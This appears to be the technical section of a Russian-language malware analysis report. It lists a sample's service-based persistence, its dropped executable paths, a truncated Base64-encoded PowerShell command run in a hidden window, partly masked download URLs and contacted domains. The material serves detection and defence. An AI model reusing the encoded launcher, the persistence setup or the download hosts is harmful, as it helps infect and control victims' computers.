Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\kbdgeoqw] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\kbdgeoqw] 'ImagePath' = '"%WINDIR%\SysWOW64\mscories\kbdgeoqw.exe"'
- 'kbdgeoqw' "%WINDIR%\SysWOW64\mscories\kbdgeoqw.exe"
- 'kbdgeoqw' %WINDIR%\SysWOW64\mscories\kbdgeoqw.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABWAHcAegAzAHAAdgBjAD0AKAAnAEgAJwArACcAdAAnACsAKAAnADcAeQBkACcAKwAnAHkAbgAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAEUATgB2ADoAVQBzAGUAcgBwAHIAbwBGAGkAbABlAFwAVgByAFoAMg...
- %HOMEPATH%\vrz2dk1\z52sdmm\yvgcdua_.exe
- %WINDIR%\syswow64\mscories\kbdgeoqw.exe
- %HOMEPATH%\vrz2dk1\z52sdmm\yvgcdua_.exe в %WINDIR%\syswow64\mscories\kbdgeoqw.exe
- '19#.#92.39.136':80
- http://sh###iushu.cn/3ls806/1rVeMNHQ/
- http://ss###rseas.co/wp-content/k/
- http://19#.#92.39.136/OT1WHfIb2oFNB1hdqS/W1mtF/GN1Bx1cEUEQttctiy0n/
- DNS ASK 91##ma.cn
- DNS ASK sh###iushu.cn
- DNS ASK ss###rseas.co
- DNS ASK pe####alservice.vip
- '%HOMEPATH%\vrz2dk1\z52sdmm\yvgcdua_.exe'
- '%WINDIR%\syswow64\mscories\kbdgeoqw.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABWAHcAegAzAHAAdgBjAD0AKAAnAEgAJwArACcAdAAnACsAKAAnADcAeQBkACcAKwAnAHkAbgAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAEUATgB2ADoAVQBzAGUAcgBwAHIAbwBGAGkAbABlAFwAVgByAFoAMg...' (со скрытым окном)